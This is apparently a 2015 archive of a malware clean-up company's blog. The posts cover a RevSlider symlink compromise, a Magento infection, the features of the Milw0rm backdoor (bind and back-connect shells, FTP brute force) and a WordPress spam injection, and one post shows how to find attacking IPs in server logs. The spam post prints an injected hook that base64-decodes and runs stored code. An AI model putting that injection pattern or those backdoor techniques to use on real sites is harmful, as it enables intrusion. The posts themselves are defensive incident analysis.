Monday, November 23, 2015

Hacked WordPress Sites To Gain Control Over Entire VPS

"RevSlider" Plugin Vulnerability Used to Access VPS File System


Background

The issue has been discovered during malware clean-up of WordPress installation on private VPS. Additionally, the server hosted around 20 more WP installations. The auto cure procedure came back showing infection left-overs and we switched to manual investigation. This short post is to show how simple and genius some hacks could be. 

Malware investigation 

First checks showed that the VPS was infected via outdated RevSlider installation (3.0.95). Hackers were able upload any arbitrary files to the host. Searching further we found some strange directory (wp-content/plugins/revslider/temp/update_extract/sym). After investigation of this directory we found taht it contained softlink to "/" (VPS root directory). As simple as that. Needless to say, that it provided attackers an access to entire file system on this VPS and hackers actually had access to any file/directory on this VPS and utilized it to infect all other WP installations.

Removing this directory and updating the vulnerable plugin solved the issue.

If you suspect your website was compromised or would like us to remove the malware, please select from ThreatSign - website monitoring and malware clean-up plans. To run free remote scan of your websites: http://quttera.com/website-malware-scanner

For other questions, do not hesitate to contact Quttera's help-desk.

Tuesday, October 20, 2015

Massive Magento Infection

Magento eCommerce Platform Hack and Repair

Recently, Quttera's malware analysts have been receiving a significant flow of Malware Removal Requests for websites powered by Magento. The attack succeeded to get handful of sites into the Google blacklists just in few hours. On 17-Oct, Magento has placed the cleanup instructions and mitigation plan for this malware. 

This post is to share the complete infection code and to raise awareness among Magento users in attempt to minimize the damage and avoid blacklisting.

Full infection code can be reviewed here: http://pastebin.com/XRnaNCUT

Screenshot of Magento Malware


If you still need any help with this or any other malware issues on Magento or other platform, Quttera is here to help.

Tuesday, July 28, 2015

Learn What Milw0rm Backdoor Malware Can Do With Your System


Background

Like the majority of our posts, this one is based on the recent malware investigation and clean-up of the infected website. It shows which tools can a backdoor, in this case milw0rm, give hackers once it is planted on the compromised website.

Hard to find due to thorough encryption and indirect connection to the affected website, backdoor easily bypasses the authentication and establishes remote access to the server. From that moment on, an attacker can use your system without being detected. If you think you've been infected by backdoor or any other malware, feel free to reach out to us at https://helpdesk.quttera.com

Milw0rm Backdoor Capabilities

Below is a list of actions that attackers can perform without your consent.

  • Server information gathering
    • OS
    • PHP version
    • Harddisk
    • Server IP
    • Client IP
Milw0rm backdoor. View the security information 

  • File tools
    • Change directory
    • Make directory
    • Execute file
    • Upload file
    • Compress/ un-compress file (zip)
Milw0rm backdoor. File tools/ Compress/ un-compress file

  • Console
    • List directory
    • Show active connections
    • IP configuration
    • ARP table
Milw0rm backdoor. Console.

Milw0rm backdoor. Console.

  • SQL browser
  • Execute PHP code
  • Safe mode bypass
    • Read file
    • List directory
    • Curl
    • Ini restore
  • String tools
    • String conversion
Milw0rm backdoor. String tools/ conversion.
    • Search text in files
    • Search for hash
  • FTP bruteforce
  • Network tools
    • Bind port to /bin /sh
    • Back-connect
  • Self remove
    • Remove the backdoor shell
  • View all the security information of the server
    • Server software
    • Disabled PHP funtions
    • cURL support
    • User account names
Needless to say, that with this level of access and control over the website and server the hacker can upload other malicious codes. At this stage the choice is very broad: email spammers, Distributed Denial of Service (DDOS) tools, fake logins and etc.

Attack origin and prevention

Avoid FTP (and any other actually) usernames that can be found in your website. As it happen in this case, you give hackers a way to brute force your FTP site credentials.

Resolution

As a part of anti-malware services for websites, the backdoor was removed and a re-consideration request has been submitted to remove website from Google and other vendors blacklists.

Wednesday, May 27, 2015

Identifying and Removing Spam From Word Press Database

Background

This case of Spam clean-up from Word Press website didn't stand out from the first glance. Customer was blacklisted by Google due to spam posts. As a part of blacklisting removal service we reviewed Google alert and start working. Internal malware scan with Quttera tools quickly identified and verified the infection and type. However, the Spam posts kept re-appearing upon successful clean-ups. This post is a short overview of Spam removal process to give you hints when you search for Spam origin in your websites.

Malware Scan and Investigation

As no suspicious posts were there in Word Press dashboard we started to investigate MySQL database tables content. Spamming posts were found and removed from database. In no time, new posts were added with different spam content. Next thing we checked cache plugins that were installed and removed them to decrease "investigation noise". After that, we dumped content of wpoptions table and investigated its content. During investigation we found two malicious Word Press options  wpdcon and wptheme_opt

wpdcon contained suspicious IP masks encoded with base64  

NS4yNTUuMTkyLjAtMTg= 
OC4qLiouKg==
MTIuMC4qLio= 

For full body see here - http://pastebin.com/uYzXu1B3

These masks are used to recognize whether request came from human visitor 

wptheme_opt  (http://pastebin.com/cdFLyL9X ) contained actually the body that loaded spam posts into the data base.

When were removed, the missing options started to generate errors upon access to a website. Investigating those errors highlighted the exact injection place.

Following is a dump of the infection:

{{{{

add_action('init', create_function('', implode("\n", array_map("base64_decode", unserialize(get_option("wptheme_opt"))))));

}}}}

Resolution

As a part of anti-malware services for websites, the re-consideration request has been submitted and Google have removed their alert. 


Thursday, February 12, 2015

Websites hacked by KkK1337 and NG689Skw

Hackers compromising vulnerable websites and defacing them


Background


Recently, our malware clean-up experts worked on sites that were hacked by KkK1337 hackers. Some sites were hacked, with the help of another team - NG689Skw. One of the notes included the following text: Developers Newbie ~ Indonesia Stealth Cyber Army ~ Amuntai Hacker Team

As per Google and some other resources, the hacked websites count is around 170 (List of sites).


As of today, we were not informed of any other damage by those groups, besides defacement and business websites that went off due to clean-up activities.

Resources

Here are some signs of the infection that we posted on pastebin:

Encoded infection - team logo body

Decoded infection

Few screenshots from compromised websites





If you suspect your website was compromised or would like us to remove the malware, please select from ThreatSign - website monitoring and malware clean-up plans. To run free remote scan of your websites: http://quttera.com/website-malware-scanner

For other questions, do not hesitate to contact Quttera help-desk.

Sunday, January 25, 2015

How To Locate Hosts That Infecting Or Sending Spam From Your Word Press Installation

Steps To Discover Malicious Hosts Attempting To Access Your Website 

When dealing with previously cleaned website that got re-infected over and over again, it is essential to monitor/check who and when tried to connect to website. Usually, POST request is used to access the malware files to launch malicious script/command. Thus, once you have the file names you can review the log files (e.g. access.log for Apache) to detect the servers that were sending these malicious requests.

Next steps would be to block those IPs to avoid further attacks and inform your provider. Further, you can use 'whois' who hosts those IPs and file the request to remove them.

Example steps for CPanel users to access logs and detect attackers

Similar steps would be applicable for the rest control panel providers.

  1. Login to CPanel and go to "Stats & Logs" 
  2. Select "Raw Access Logs" from the menu to navigate to logs archive

    CPanel - Raw Access Log
  3. Download logs archive

    CPanel - download raw access log archive
  4. Extract archive content to an empty directory
  5. Run the following command on extracted file: # grep -irHn POST <file> | grep -v admin

When you are done with all the steps above, you should see output containing the date/time, file and IP that tried to access this file along with other info.

Here is an example shared by Quttera-Labs researcher taken from one of recent malware removal process:

85.214.94.159 - - [24/Jan/2015:21:32:41 +0100] "POST /wp-content/uploads/mp3-320/insomnia3/320/db.php HTTP/1.1" 404 72391 "-" "Mozilla/5.0 (Windows NT 6.1; W
OW64; rv:33.0) Gecko/20100101 Firefox/33.0"
85.214.94.159 - - [24/Jan/2015:21:32:44 +0100] "POST /wp-includes/SimplePie/Content/Type/info.php HTTP/1.1" 404 72387 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64
; rv:33.0) Gecko/20100101 Firefox/33.0"
85.214.94.159 - - [24/Jan/2015:21:32:45 +0100] "POST /wp-content/plugins/jetpack/modules/social-links.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 6.1; W
OW64; rv:33.0) Gecko/20100101 Firefox/33.0"


91.121.60.19 - - [25/Jan/2015:03:49:33 +0100] "POST /wp-content/plugins/wp-statistics/includes/functions/general.php HTTP/1.1" 404 72407 "-" "Mozilla/5.0 (Wi
ndows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
91.121.60.19 - - [25/Jan/2015:03:49:36 +0100] "POST /wp-content/uploads/mp3-320/insomnia3/320/db.php HTTP/1.1" 404 72391 "-" "Mozilla/5.0 (Windows NT 6.1; WO
W64; rv:33.0) Gecko/20100101 Firefox/33.0"
91.121.60.19 - - [25/Jan/2015:03:49:37 +0100] "POST /wp-content/plugins/woocommerce/i18n/db.php HTTP/1.1" 404 72386 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; 
rv:33.0) Gecko/20100101 Firefox/33.0"

If you suspect your website was compromised or would like us to remove the malware, please select from ThreatSign - website monitoring and malware clean-up plans. To run free remote scan of your websites: http://quttera.com/website-malware-scanner

For other questions, do not hesitate to contact Quttera help-desk.